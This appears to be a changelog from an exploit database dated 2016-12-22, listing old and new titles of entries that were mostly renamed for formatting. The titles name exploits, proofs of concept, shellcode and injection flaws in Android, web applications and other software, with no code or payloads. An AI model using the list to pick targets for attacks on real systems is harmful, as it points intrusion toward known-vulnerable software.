DB: 2016-12-22

3 new exploits

Android - getpidcon Usage binder Service Replacement Race Condition
Google Android - getpidcon Usage binder Service Replacement Race Condition

ADODB < 4.70 - (tmssql.php) Denial of Service
ADODB < 4.70 - 'tmssql.php' Denial of Service

FlashGet 3.x - IEHelper Remote Exec (PoC)
FlashGet 3.x - IEHelper Remote Execution (PoC)
SopCast SopCore Control ActiveX - Remote Exec (PoC)
UUSee ReliPlayer ActiveX - Remote Exec (PoC)
SPlayer XvidDecoder 3.3 - ActiveX Remote Exec (PoC)
SopCast SopCore Control ActiveX - Remote Execution (PoC)
UUSee ReliPlayer ActiveX - Remote Execution (PoC)
SPlayer XvidDecoder 3.3 - ActiveX Remote Execution (PoC)

Xunlei XPPlayer 5.9.14.1246 - ActiveX Remote Exec (PoC)
Xunlei XPPlayer 5.9.14.1246 - ActiveX Remote Execution (PoC)

EViews 7.0.0.1 - (aka 7.2) Multiple Vulnerabilities
EViews 7.0.0.1 (aka 7.2) - Multiple Vulnerabilities

Android Kernel 2.6 - Local Denial of Service Crash (PoC)
Google Android Kernel 2.6 - Local Denial of Service Crash (PoC)

IBM solidDB 6.0.10 - (Format String and Denial of Service) Multiple Vulnerabilities
IBM solidDB 6.0.10 - Format String / Denial of Service

OpenLDAP 2.4.22 - ('modrdn' Request) Multiple Vulnerabilities
OpenLDAP 2.4.22 - 'modrdn' Request Multiple Vulnerabilities

Apple Mac OSX Regex Engine (TRE) - (Integer Signedness and Overflow) Multiple Vulnerabilities
Apple Mac OSX Regex Engine (TRE) - Integer Signedness / Overflow

Android - ih264d_process_intra_mb Memory Corruption
Google Android - 'ih264d_process_intra_mb' Memory Corruption
Android - IOMX getConfig/getParameter Information Disclosure
Android - IMemory Native Interface is Insecure for IPC Use
Google Android - IOMX getConfig/getParameter Information Disclosure
Google Android - IMemory Native Interface is Insecure for IPC Use

Android Broadcom Wi-Fi Driver - Memory Corruption
Google Android Broadcom Wi-Fi Driver - Memory Corruption

Android - /system/bin/sdcard Stack Buffer Overflow
Google Android - '/system/bin/sdcard' Stack Buffer Overflow
Android - Insufficient Binder Message Verification Pointer Leak
Android - 'gpsOneXtra' Data Files Denial of Service
Google Android - Insufficient Binder Message Verification Pointer Leak
Google Android - 'gpsOneXtra' Data Files Denial of Service

Android - Binder Generic ASLR Leak
Google Android - Binder Generic ASLR Leak

Android - IOMXNodeInstance::enableNativeBuffers Unchecked Index
Google Android - IOMXNodeInstance::enableNativeBuffers Unchecked Index

Google Android -  WifiNative::setHotlist Stack Overflow
Google Android - WifiNative::setHotlist Stack Overflow
Microsoft Edge - SIMD.toLocaleString Uninitialized Memory (MS16-145)
Microsoft Edge - Internationalization Initialization Type Confusion (MS16-144)

PHP 4.4.0 - (mysql_connect function) Local Buffer Overflow
PHP 4.4.0 - 'mysql_connect function' Local Buffer Overflow

Android 1.x/2.x - Privilege Escalation
Google Android 1.x/2.x - Privilege Escalation

Android - 'sensord' Privilege Escalation
Google Android - 'sensord' Privilege Escalation

tcpdump - ISAKMP Identification payload Integer Overflow
tcpdump - ISAKMP Identification Payload Integer Overflow

Smail 3.2.0.120 -  Heap Overflow
Smail 3.2.0.120 - Heap Overflow

HP Mercury Quality Center 9.0 build 9.1.0.4352 - SQL Execution Exploit
HP Mercury Quality Center 9.0 build 9.1.0.4352 - SQL Execution

Motorola Wimax modem CPEi300 - (File Disclosure / Cross-Site Scripting) Multiple Vulnerabilities
Motorola Wimax modem CPEi300 - File Disclosure / Cross-Site Scripting

navicopa WebServer 3.0.1 - (Buffer Overflow / Script Source Disclosure) Multiple Vulnerabilities
navicopa WebServer 3.0.1 - Buffer Overflow / Script Source Disclosure

dwebpro 6.8.26 - (Directory Traversal/File Disclosure) Multiple Vulnerabilities
dwebpro 6.8.26 - Directory Traversal / File Disclosure

citrix xencenterweb - (Cross-Site Scripting / SQL Injection / Remote Code Execution) Multiple Vulnerabilities
citrix xencenterweb - Cross-Site Scripting / SQL Injection / Remote Code Execution
Adobe GetPlus get_atlcom 1.6.2.48 - ActiveX Remote Exec (PoC)
Trend Micro Web-Deployment ActiveX - Remote Exec (PoC)
Adobe GetPlus get_atlcom 1.6.2.48 - ActiveX Remote Execution (PoC)
Trend Micro Web-Deployment ActiveX - Remote Execution (PoC)
Apache OFBiz - SQL Remote Execution PoC Payload
Apache OFBiz - FULLADMIN Creator PoC Payload
Apache OFBiz - Remote Execution (via SQL Execution) (PoC)
Apache OFBiz - Admin Creator (PoC)

Android 2.0 < 2.1 - Reverse Shell Exploit
Google Android 2.0 < 2.1 - Reverse Shell Exploit

Android 2.0/2.1 - Use-After-Free Remote Code Execution on Webkit
Google Android 2.0/2.1 - Use-After-Free Remote Code Execution on Webkit

Android 2.0 / 2.1 /2.1.1 - WebKit Use-After-Free Exploit
Google Android 2.0/2.1/2.1.1 - WebKit Use-After-Free Exploit

Android - Inter-Process munmap with User-Controlled Size in android.graphics.Bitmap
Google Android - Inter-Process munmap with User-Controlled Size in android.graphics.Bitmap

ASUS RT-AC66U - 'acsd' Parameter  Remote Command Execution
ASUS RT-AC66U - 'acsd' Parameter Remote Command Execution

WinComLPD Total 3.0.2.623 - (Buffer Overflow and Authentication Bypass) Multiple Vulnerabilities
WinComLPD Total 3.0.2.623 - Buffer Overflow / Authentication Bypass

Android - libutils UTF16 to UTF8 Conversion Heap Buffer Overflow
Google Android - libutils UTF16 to UTF8 Conversion Heap Buffer Overflow

McAfee ePolicy Orchestrator 4.6.0 < 4.6.5 - (ePowner) Multiple Vulnerabilities
McAfee ePolicy Orchestrator 4.6.0 < 4.6.5 - 'ePowner' Multiple Vulnerabilities

ServletExec - (Directory Traversal / Authentication Bypass) Multiple Vulnerabilities
ServletExec - Directory Traversal / Authentication Bypass

Android - 'Stagefright' Remote Code Execution
Google Android - 'Stagefright' Remote Code Execution

Android - libstagefright Integer Overflow Remote Code Execution
Google Android - libstagefright Integer Overflow Remote Code Execution

Android 2.3.5 - PowerVR SGX Driver Information Disclosure
Google Android 2.3.5 - PowerVR SGX Driver Information Disclosure

Android ADB Debug Server - Remote Payload Execution (Metasploit)
Google Android ADB Debug Server - Remote Payload Execution (Metasploit)

Android 5.0.1 - Metaphor Stagefright Exploit (ASLR Bypass)
Google Android 5.0.1 - Metaphor Stagefright Exploit (ASLR Bypass)

Android - 'BadKernel' Remote Code Execution
Google Android - 'BadKernel' Remote Code Execution

Android 5.0 <= 5.1.1 - 'Stagefright' .MP4 tx3g Integer Overflow (Metasploit)
Google Android 5.0 <= 5.1.1 - 'Stagefright' .MP4 tx3g Integer Overflow (Metasploit)

NETGEAR WNR2000v5 - Remote Code Execution
Linux/x86 - portbind payload Shellcode (Generator)
Windows XP SP1 - portbind payload Shellcode (Generator)
Linux/x86 - Portbind Payload Shellcode (Generator)
Windows XP SP1 - Portbind Payload Shellcode (Generator)

Android - Telnetd (Port 1035) with Parameters Shellcode (248 bytes)
Google Android - Telnetd (Port 1035) with Parameters Shellcode (248 bytes)

phpCOIN 1.2.2 - (phpcoinsessid) SQL Inj / Remote Code Execution
phpCOIN 1.2.2 - 'phpcoinsessid' SQL Injection / Remote Code Execution

Aztek Forum 4.00 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities (PoC)
Aztek Forum 4.00 - Cross-Site Scripting / SQL Injection

Integramod Portal 2.x - (functions_portal.php) Remote File Inclusion
Integramod Portal 2.x - 'functions_portal.php' Remote File Inclusion

Integramod Portal 2.0 rc2 - 'phpbb_root_path' Remote File Inclusion
Integramod Portal 2.0 rc2 - 'phpbb_root_path' Parameter Remote File Inclusion

paBugs 2.0 Beta 3 - (class.mysql.php) Remote File Inclusion
paBugs 2.0 Beta 3 - 'class.mysql.php' Remote File Inclusion

Agora 1.4 RC1 - (MysqlfinderAdmin.php) Remote File Inclusion
Agora 1.4 RC1 - 'MysqlfinderAdmin.php' Remote File Inclusion

blogme 3.0 - (Cross-Site Scripting / Authentication Bypass) Multiple Vulnerabilities
blogme 3.0 - Cross-Site Scripting / Authentication Bypass

torrentflux 2.2 - (Arbitrary File Create/ Execute / Delete) Multiple Vulnerabilities
torrentflux 2.2 - Arbitrary File Create/ Execute/Delete

BBS E-Market Professional - (Full Path Disclosure / File Inclusion) Multiple Vulnerabilities
BBS E-Market Professional - Full Path Disclosure / File Inclusion

myPHPNuke Module My_eGallery 2.5.6 - 'basepath' Remote File Inclusion
myPHPNuke Module My_eGallery 2.5.6 - 'basepath' Parameter Remote File Inclusion

ig shop 1.0 - (Code Execution / SQL Injection) Multiple Vulnerabilities
ig shop 1.0 - Code Execution / SQL Injection

QUOTE&ORDERING SYSTEM 1.0 - (ordernum) Multiple Vulnerabilities
QUOTE&ORDERING SYSTEM 1.0 - 'ordernum' Multiple Vulnerabilities

vp-asp shopping cart 6.09 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
vp-asp shopping cart 6.09 - SQL Injection / Cross-Site Scripting

forum livre 1.0 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
forum livre 1.0 - SQL Injection / Cross-Site Scripting

otscms 2.1.5 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
otscms 2.1.5 - SQL Injection / Cross-Site Scripting

Connectix Boards 0.7 - (p_skin) Multiple Vulnerabilities
Connectix Boards 0.7 - 'p_skin' Multiple Vulnerabilities

wbblog - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities
wbblog - Cross-Site Scripting / SQL Injection

PHP-Nuke Module Eve-Nuke 0.1 - (mysql.php) Remote File Inclusion
PHP-Nuke Module Eve-Nuke 0.1 - 'mysql.php' Remote File Inclusion

Quick and Dirty Blog (qdblog) 0.4 - (SQL Injection / Local File Inclusion) Multiple Vulnerabilities
Quick and Dirty Blog (qdblog) 0.4 - SQL Injection / Local File Inclusion

PHP Coupon Script 3.0 - (index.php bus) SQL Injection
PHP Coupon Script 3.0 - 'bus' Parameter SQL Injection

runawaysoft haber portal 1.0 - (tr) Multiple Vulnerabilities
runawaysoft haber portal 1.0 - 'tr' Multiple Vulnerabilities

NetClassifieds - (SQL Injection / Cross-Site Scripting / Full Path) Multiple Vulnerabilities
NetClassifieds - SQL Injection / Cross-Site Scripting / Full Path

bugmall shopping cart 2.5 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
bugmall shopping cart 2.5 - SQL Injection / Cross-Site Scripting

PHPVID 0.9.9 - (categories_type.php cat) SQL Injection
PHPVID 0.9.9 - 'categories_type.php' SQL Injection

bcoos 1.0.10 - (Local File Inclusion / SQL Injection) Multiple Vulnerabilities
bcoos 1.0.10 - Local File Inclusion / SQL Injection

ftp Admin 0.1.0 - (Local File Inclusion / Cross-Site Scripting / Authentication Bypass) Multiple Vulnerabilities
ftp Admin 0.1.0 - Local File Inclusion / Cross-Site Scripting / Authentication Bypass

falcon CMS 1.4.3 - (Remote File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities
falcon CMS 1.4.3 - Remote File Inclusion / Cross-Site Scripting

gf-3xplorer 2.4 - (Cross-Site Scripting / Local File Inclusion) Multiple Vulnerabilities
gf-3xplorer 2.4 - Cross-Site Scripting / Local File Inclusion

PortalApp 4.0 - (SQL Injection / Cross-Site Scripting / Authentication Bypass) Multiple Vulnerabilities
PortalApp 4.0 - SQL Injection / Cross-Site Scripting / Authentication Bypass

netrisk 1.9.7 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities
netrisk 1.9.7 - Cross-Site Scripting / SQL Injection
EasyClassifields 3.0 - (go) SQL Injection
CMSbright - (id_rub_page) SQL Injection
EasyClassifields 3.0 - 'go' Parameter SQL Injection
CMSbright - 'id_rub_page' Parameter SQL Injection
myPHPNuke < 1.8.8_8rc2 - 'artid' SQL Injection
Coupon Script 4.0 - 'id' SQL Injection
Reciprocal Links Manager 1.1 - (site) SQL Injection
myPHPNuke < 1.8.8_8rc2 - 'artid' Parameter SQL Injection
Coupon Script 4.0 - 'id' Parameter SQL Injection
Reciprocal Links Manager 1.1 - 'site' Parameter SQL Injection
CS-Cart 1.3.5 - (Authentication Bypass) SQL Injection
Spice Classifieds - (cat_path) SQL Injection
CS-Cart 1.3.5 - Authentication Bypass
Spice Classifieds - 'cat_path' Parameter SQL Injection

aspwebalbum 3.2 - (Arbitrary File Upload / SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
aspwebalbum 3.2 - Arbitrary File Upload / SQL Injection / Cross-Site Scripting
Living Local Website - 'listtest.php r' SQL Injection
ACG-PTP 1.0.6 - 'adid' SQL Injection
qwicsite pro - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
ACG-ScriptShop - 'cid' SQL Injection
AWStats Totals - 'AWStatstotals.php sort' Remote Code Execution
Living Local Website - 'listtest.php' SQL Injection
ACG-PTP 1.0.6 - 'adid' Parameter SQL Injection
qwicsite pro - SQL Injection / Cross-Site Scripting
ACG-ScriptShop - 'cid' Parameter SQL Injection
AWStats Totals 1.14 - 'AWStatstotals.php' Remote Code Execution
Vastal I-Tech Agent Zone - (ann_id) SQL Injection
Vastal I-Tech Visa Zone - (news_id) SQL Injection
Vastal I-Tech Toner Cart - 'id' SQL Injection
Vastal I-Tech Share Zone - 'id' SQL Injection
Vastal I-Tech DVD Zone - 'cat_id' SQL Injection
Vastal I-Tech Jobs Zone - (news_id) SQL Injection
Vastal I-Tech MMORPG Zone - (game_id) SQL Injection
Vastal I-Tech Mag Zone - 'cat_id' SQL Injection
Vastal I-Tech Freelance Zone - (coder_id) SQL Injection
Vastal I-Tech Cosmetics Zone - 'cat_id' SQL Injection
EsFaq 2.0 - (idcat) SQL Injection
Vastal I-Tech Shaadi Zone 1.0.9 - (tage) SQL Injection
Vastal I-Tech Dating Zone - (fage) SQL Injection
Vastal I-Tech Agent Zone - 'ann_id' Parameter SQL Injection
Vastal I-Tech Visa Zone - 'news_id' Parameter SQL Injection
Vastal I-Tech Toner Cart - 'id' Parameter SQL Injection
Vastal I-Tech Share Zone - 'id' Parameter SQL Injection
Vastal I-Tech DVD Zone - 'cat_id' Parameter SQL Injection
Vastal I-Tech Jobs Zone - 'news_id' Parameter SQL Injection
Vastal I-Tech MMORPG Zone - 'game_id' Parameter SQL Injection
Vastal I-Tech Mag Zone - 'cat_id' Parameter SQL Injection
Vastal I-Tech Freelance Zone - 'coder_id' Parameter SQL Injection
Vastal I-Tech Cosmetics Zone - 'cat_id' Parameter SQL Injection
EsFaq 2.0 - 'idcat' Parameter SQL Injection
Vastal I-Tech Shaadi Zone 1.0.9 - 'tage' Parameter SQL Injection
Vastal I-Tech Dating Zone - 'fage' Parameter SQL Injection
Masir Camp E-Shop Module 3.0 - (ordercode) SQL Injection
Alstrasoft Forum - (cat) SQL Injection
Masir Camp E-Shop Module 3.0 - 'ordercode' Parameter SQL Injection
Alstrasoft Forum - 'cat' Parameter SQL Injection

Alstrasoft Forum - 'catid' SQL Injection
Alstrasoft Forum - 'catid' Parameter SQL Injection

Creator CMS 5.0 - (sideid) SQL Injection
Creator CMS 5.0 - 'sideid' Parameter SQL Injection

CMS Buzz - 'id' SQL Injection
CMS Buzz - 'id' Parameter SQL Injection
phpVID 1.1 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities
Zanfi CMS lite / Jaw Portal free - 'page' SQL Injection
PhpWebGallery 1.3.4 - (Cross-Site Scripting / Local File Inclusion) Multiple Vulnerabilities
Autodealers CMS AutOnline - (pageid) SQL Injection
Sports Clubs Web Panel 0.0.1 - (p) Local File Inclusion
PHPVID 1.1 - Cross-Site Scripting / SQL Injection
Zanfi CMS lite / Jaw Portal free - 'page' Parameter SQL Injection
PhpWebGallery 1.3.4 - Cross-Site Scripting / Local File Inclusion
Autodealers CMS AutOnline - 'pageid' Parameter SQL Injection
Sports Clubs Web Panel 0.0.1 - 'p' Parameter Local File Inclusion
Autodealers CMS AutOnline - 'id' SQL Injection
Sports Clubs Web Panel 0.0.1 - 'id' SQL Injection
PhpWebGallery 1.3.4 - (cat) Blind SQL Injection
Autodealers CMS AutOnline - 'id' Parameter SQL Injection
Sports Clubs Web Panel 0.0.1 - 'id' Parameter SQL Injection
PhpWebGallery 1.3.4 - Blind SQL Injection

phpsmartcom 0.2 - (Local File Inclusion / SQL Injection) Multiple Vulnerabilities
phpsmartcom 0.2 - Local File Inclusion / SQL Injection

AvailScript Article Script - 'view.php v' SQL Injection
AvailScript Article Script - 'view.php' SQL Injection

Fastpublish CMS 1.9999 - (Local File Inclusion / SQL Injection) Multiple Vulnerabilities
Fastpublish CMS 1.9999 - Local File Inclusion / SQL Injection

mini-pub 0.3 - (File Disclosure/Code Execution) Multiple Vulnerabilities
mini-pub 0.3 - File Disclosure / Code Execution

websvn 2.0 - (Cross-Site Scripting / File Handling/Code Execution) Multiple Vulnerabilities
websvn 2.0 - Cross-Site Scripting / File Handling / Code Execution

phpdaily - (SQL Injection / Cross-Site Scripting / lfd) Multiple Vulnerabilities
phpdaily - SQL Injection / Cross-Site Scripting / Local File Download

questcms - (Cross-Site Scripting / Directory Traversal / SQL Injection) Multiple Vulnerabilities
questcms - Cross-Site Scripting / Directory Traversal / SQL Injection

MatPo Link 1.2b - (Blind SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
MatPo Link 1.2b - Blind SQL Injection / Cross-Site Scripting

WEBBDOMAIN WebShop 1.02 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
WEBBDOMAIN WebShop 1.02 - SQL Injection / Cross-Site Scripting

Prozilla Software Directory - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities
Prozilla Software Directory - Cross-Site Scripting / SQL Injection

TurnkeyForms Local Classifieds - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities
TurnkeyForms Local Classifieds - Cross-Site Scripting / SQL Injection

zeeproperty 1.0 - (Arbitrary File Upload / Cross-Site Scripting) Multiple Vulnerabilities
zeeproperty 1.0 - Arbitrary File Upload / Cross-Site Scripting
Openfire Server 3.6.0a - (Authentication Bypass / SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
Collabtive 0.4.8 - (Cross-Site Scripting / Authentication Bypass / Arbitrary File Upload) Multiple Vulnerabilities
Openfire Server 3.6.0a - Authentication Bypass / SQL Injection / Cross-Site Scripting
Collabtive 0.4.8 - Cross-Site Scripting / Authentication Bypass / Arbitrary File Upload

MODx CMS 0.9.6.2 - (Remote File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities
MODx CMS 0.9.6.2 - Remote File Inclusion / Cross-Site Scripting
ftpzik - (Cross-Site Scripting / Local File Inclusion) Multiple Vulnerabilities
bandwebsite 1.5 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
ftpzik - Cross-Site Scripting / Local File Inclusion
bandwebsite 1.5 - SQL Injection / Cross-Site Scripting

nitrotech 0.0.3a - (Remote File Inclusion / SQL Injection) Multiple Vulnerabilities
nitrotech 0.0.3a - Remote File Inclusion / SQL Injection
chipmunk topsites - (Authentication Bypass / Cross-Site Scripting) Multiple Vulnerabilities
Clean CMS 1.5 - (Blind SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
chipmunk topsites - Authentication Bypass / Cross-Site Scripting
Clean CMS 1.5 - Blind SQL Injection / Cross-Site Scripting

Ocean12 Contact Manager Pro - (SQL Injection / Cross-Site Scripting / File Disclosure) Multiple Vulnerabilities
Ocean12 Contact Manager Pro - SQL Injection / Cross-Site Scripting / File Disclosure

comersus asp shopping cart - (File Disclosure / Cross-Site Scripting) Multiple Vulnerabilities
Comersus ASP Shopping Cart - File Disclosure / Cross-Site Scripting

minimal ablog 0.4 - (SQL Injection / Arbitrary File Upload / Authentication Bypass) Multiple Vulnerabilities
minimal ablog 0.4 - SQL Injection / Arbitrary File Upload / Authentication Bypass

wbstreet 1.0 - (SQL Injection / File Disclosure) Multiple Vulnerabilities
wbstreet 1.0 - SQL Injection / File Disclosure

template creature - (SQL Injection / File Disclosure) Multiple Vulnerabilities
template creature - SQL Injection / File Disclosure

merlix educate servert - (Authentication Bypass/File Disclosure) Multiple Vulnerabilities
merlix educate servert - Authentication Bypass / File Disclosure

nightfall personal diary 1.0 - (Cross-Site Scripting / File Disclosure) Multiple Vulnerabilities
nightfall personal diary 1.0 - Cross-Site Scripting / File Disclosure

ASP AutoDealer - (SQL Injection / File Disclosure) Multiple Vulnerabilities
ASP AutoDealer - SQL Injection / File Disclosure

aspmanage banners - (Arbitrary File Upload / File Disclosure) Multiple Vulnerabilities
aspmanage banners - Arbitrary File Upload / File Disclosure

asp talk - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
asp talk - SQL Injection / Cross-Site Scripting

webcaf 1.4 - (Local File Inclusion / Remote Code Execution) Multiple Vulnerabilities
webcaf 1.4 - Local File Inclusion / Remote Code Execution

PHPmyGallery 1.0beta2 - (Remote File Inclusion / Local File Inclusion) Multiple Vulnerabilities
PHPmyGallery 1.0beta2 - Remote File Inclusion / Local File Inclusion

postecards - (SQL Injection / File Disclosure) Multiple Vulnerabilities
postecards - SQL Injection / File Disclosure

PHP Multiple Newsletters 2.7 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities
PHP Multiple Newsletters 2.7 - Local File Inclusion / Cross-Site Scripting
living Local 1.1 - (Cross-Site Scripting / Arbitrary File Upload) Multiple Vulnerabilities
Pro Chat Rooms 3.0.2 - (Cross-Site Scripting / Cross-Site Request Forgery) Multiple Vulnerabilities
living Local 1.1 - Cross-Site Scripting / Arbitrary File Upload
Pro Chat Rooms 3.0.2 - Cross-Site Scripting / Cross-Site Request Forgery

cf shopkart 5.2.2 - (SQL Injection / File Disclosure) Multiple Vulnerabilities
cf shopkart 5.2.2 - SQL Injection / File Disclosure

the net guys aspired2blog - (SQL Injection / File Disclosure) Multiple Vulnerabilities
the net guys aspired2blog - SQL Injection / File Disclosure

Joomla! Component live chat - (SQL Injection / Open Proxy) Multiple Vulnerabilities
Joomla! Component live chat - SQL Injection / Open Proxy

Simple Text-File Login script (SiTeFiLo) 1.0.6 - (File Disclosure / Remote File Inclusion) Multiple Vulnerabilities
Simple Text-File Login script (SiTeFiLo) 1.0.6 - File Disclosure / Remote File Inclusion

autositephp 2.0.3 - (Local File Inclusion / Cross-Site Request Forgery / Edit File) Multiple Vulnerabilities
autositephp 2.0.3 - Local File Inclusion / Cross-Site Request Forgery / Edit File

PHP weather 2.2.2 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities
PHP weather 2.2.2 - Local File Inclusion / Cross-Site Scripting

isweb CMS 3.0 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
isweb CMS 3.0 - SQL Injection / Cross-Site Scripting

clickandemail - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
clickandemail - SQL Injection / Cross-Site Scripting

Zelta E Store - (Arbitrary File Upload / Bypass / SQL Injection / Blind SQL Injection) Multiple Vulnerabilities
Zelta E Store - Arbitrary File Upload / Bypass / SQL Injection / Blind SQL Injection

chicomas 2.0.4 - (Database Backup/File Disclosure / Cross-Site Scripting) Multiple Vulnerabilities
chicomas 2.0.4 - Database Backup / File Disclosure / Cross-Site Scripting

phpg 1.6 - (Cross-Site Scripting / Full Path Disclosure/Denial of Service) Multiple Vulnerabilities
phpg 1.6 - Cross-Site Scripting / Full Path Disclosure / Denial of Service

doop CMS 1.4.0b - (Cross-Site Request Forgery / Arbitrary File Upload) Multiple Vulnerabilities
doop CMS 1.4.0b - Cross-Site Request Forgery / Arbitrary File Upload

phpskelsite 1.4 - (Remote File Inclusion / Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities
phpskelsite 1.4 - Remote File Inclusion / Local File Inclusion / Cross-Site Scripting

ezpack 4.2b2 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities
ezpack 4.2b2 - Cross-Site Scripting / SQL Injection

Netvolution CMS 1.0 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities
Netvolution CMS 1.0 - Cross-Site Scripting / SQL Injection
rankem - (File Disclosure / Cross-Site Scripting / cm) Multiple Vulnerabilities
blogit! - (SQL Injection / File Disclosure / Cross-Site Scripting) Multiple Vulnerabilities
rankem - File Disclosure / Cross-Site Scripting / Cookie
blogit! - SQL Injection / File Disclosure / Cross-Site Scripting

gamescript 4.6 - (Cross-Site Scripting / SQL Injection / Local File Inclusion) Multiple Vulnerabilities
gamescript 4.6 - Cross-Site Scripting / SQL Injection / Local File Inclusion

revou twitter clone - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities
revou twitter clone - Cross-Site Scripting / SQL Injection

bpautosales 1.0.1 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities
bpautosales 1.0.1 - Cross-Site Scripting / SQL Injection

sma-db 0.3.12 - (Remote File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities
sma-db 0.3.12 - Remote File Inclusion / Cross-Site Scripting

Android 'content://' URI - Multiple Information Disclosure Vulnerabilities
Google Android - 'content://' URI Multiple Information Disclosure Vulnerabilities
Power System Of Article Management 3.0 - (File Disclosure / Cross-Site Scripting) Multiple Vulnerabilities
team 1.x - (File Disclosure / Cross-Site Scripting) Multiple Vulnerabilities
Power System Of Article Management 3.0 - File Disclosure / Cross-Site Scripting
team 1.x - File Disclosure / Cross-Site Scripting

gr blog 1.1.4 - (Arbitrary File Upload / Authentication Bypass) Multiple Vulnerabilities
gr blog 1.1.4 - Arbitrary File Upload / Authentication Bypass

Kipper 2.01 - (Cross-Site Scripting / Local File Inclusion / File Disclosure) Multiple Vulnerabilities
Kipper 2.01 - Cross-Site Scripting / Local File Inclusion / File Disclosure

SilverNews 2.04 - (Authentication Bypass / Local File Inclusion / Remote Code Execution) Multiple Vulnerabilities
SilverNews 2.04 - Authentication Bypass / Local File Inclusion / Remote Code Execution
AdaptCMS Lite 1.4 - (Cross-Site Scripting / Remote File Inclusion) Multiple Vulnerabilities
SnippetMaster Webpage Editor 2.2.2 - (Remote File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities
AdaptCMS Lite 1.4 - Cross-Site Scripting / Remote File Inclusion
SnippetMaster Webpage Editor 2.2.2 - Remote File Inclusion / Cross-Site Scripting

dacio's CMS 1.08 - (Cross-Site Scripting / SQL Injection / File Disclosure) Multiple Vulnerabilities
dacio's CMS 1.08 - Cross-Site Scripting / SQL Injection / File Disclosure

ideacart 0.02 - (Local File Inclusion / SQL Injection) Multiple Vulnerabilities
ideacart 0.02 - Local File Inclusion / SQL Injection

CmsFaethon 2.2.0 - (info.php item) SQL Command Injection
CmsFaethon 2.2.0 - info.php item SQL Command Injection

powermovielist 0.14b - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
powermovielist 0.14b - SQL Injection / Cross-Site Scripting

Graugon Forum 1 - 'id' SQL Command Injection
Graugon Forum 1 - 'id' Command Injection (via SQL Injection)

irokez blog 0.7.3.2 - (Cross-Site Scripting / Remote File Inclusion / Blind SQL Injection) Multiple Vulnerabilities
irokez blog 0.7.3.2 - Cross-Site Scripting / Remote File Inclusion / Blind SQL Injection

ritsblog 0.4.2 - (Authentication Bypass / Cross-Site Scripting) Multiple Vulnerabilities
ritsblog 0.4.2 - Authentication Bypass / Cross-Site Scripting
blindblog 1.3.1 - (SQL Injection / Authentication Bypass / Local File Inclusion) Multiple Vulnerabilities
tghostscripter Amazon Shop - (Cross-Site Scripting / Directory Traversal / Remote File Inclusion) Multiple Vulnerabilities
blindblog 1.3.1 - SQL Injection / Authentication Bypass / Local File Inclusion
tghostscripter Amazon Shop - Cross-Site Scripting / Directory Traversal / Remote File Inclusion

Wili-CMS 0.4.0 - (Remote File Inclusion / Local File Inclusion / Authentication Bypass) Multiple Vulnerabilities
Wili-CMS 0.4.0 - Remote File Inclusion / Local File Inclusion / Authentication Bypass

PHP Director 0.21 - (sql into outfile) eval() Injection
PHP Director 0.21 - (SQL into outfile) eval() Injection

phpCommunity 2.1.8 - (SQL Injection / Directory Traversal / Cross-Site Scripting) Multiple Vulnerabilities
phpCommunity 2.1.8 - SQL Injection / Directory Traversal / Cross-Site Scripting

phpmysport 1.4 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities
phpmysport 1.4 - Cross-Site Scripting / SQL Injection

Kim Websites 1.0 - (Authentication Bypass) SQL Injection
Kim Websites 1.0 - Authentication Bypass

Bloginator 1a - (Cookie Bypass / SQL Injection) Multiple Vulnerabilities
Bloginator 1a - Cookie Bypass / SQL Injection

Pixie CMS - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities
Pixie CMS - Cross-Site Scripting / SQL Injection
Codice CMS 2 - SQL Command Execution
Syzygy CMS 0.3 - Local File Inclusion / SQL Command Injection
Codice CMS 2 - Command Execution (via SQL Injection)
Syzygy CMS 0.3 - Local File Inclusion / SQL Injection

acute control panel 1.0.0 - (SQL Injection / Remote File Inclusion) Multiple Vulnerabilities
acute control panel 1.0.0 - SQL Injection / Remote File Inclusion

Diskos CMS Manager - (SQL Injection / File Disclosure/Authentication Bypass) Multiple Vulnerabilities
Diskos CMS Manager - SQL Injection / File Disclosure / Authentication Bypass
ablespace 1.0 - (Cross-Site Scripting / Blind SQL Injection) Multiple Vulnerabilities
PHP-revista 1.1.2 - (Remote File Inclusion / SQL Injection / Authentication Bypass / Cross-Site Scripting) Multiple Vulnerabilities
ablespace 1.0 - Cross-Site Scripting / Blind SQL Injection
PHP-revista 1.1.2 - Remote File Inclusion / SQL Injection / Authentication Bypass / Cross-Site Scripting

flatnux 2009-03-27 - (Arbitrary File Upload / Information Disclosure) Multiple Vulnerabilities
flatnux 2009-03-27 - Arbitrary File Upload / Information Disclosure

fungamez rc1 - (Authentication Bypass / Local File Inclusion) Multiple Vulnerabilities
fungamez rc1 - Authentication Bypass / Local File Inclusion

